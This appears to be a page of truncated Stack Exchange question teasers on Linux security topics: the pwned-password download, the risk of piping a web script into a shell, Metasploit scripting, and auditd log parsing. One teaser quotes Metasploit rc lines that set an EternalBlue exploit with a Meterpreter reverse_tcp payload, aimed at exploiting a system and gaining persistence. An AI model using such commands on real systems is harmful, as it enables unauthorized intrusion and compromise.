How to get the pwned password list under Linux in the aera of ‘PwnedPasswordsDownloader’? [closed]

I noticed, that the direct download link to the whole list as an archive has vanished from the page at https://haveibeenpwned.com/Passwords .
It now refers to the PwnedPasswordsDownloader git-repo which offers a Windows dotNet Tool. But I … Continue reading How to get the pwned password list under Linux in the aera of ‘PwnedPasswordsDownloader’? [closed]

macapps.link – possible attack vector – could you pipe through some security script

I asked this at https://apple.stackexchange.com/questions/445343/macapps-link-possible-attack-vector-could-you-pipe-through-some-security-scr but I think this would be more appropriate place.
A work colleague said she is using https://maca… Continue reading macapps.link – possible attack vector – could you pipe through some security script

How do you place sequential metasploit rc scripts into a standard linux script [closed]

Working on a quick and easy script to exploit a system and establish persistence. To do so I have written 2 .rc scripts
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp<
set rhost 156.156.1…. Continue reading How do you place sequential metasploit rc scripts into a standard linux script [closed]

Rsyslog & Auditd – Parsing audit.log / proctitle hexadecimal value to ascii [migrated]

I’m trying to edit my rsyslog.conf in order to set hex parts of my auditd logs in clear.
Does anyone know if it is possible to configure rsyslog in order to apply a parsing on the log received by a bash script ? (Or any other technique)
It… Continue reading Rsyslog & Auditd – Parsing audit.log / proctitle hexadecimal value to ascii [migrated]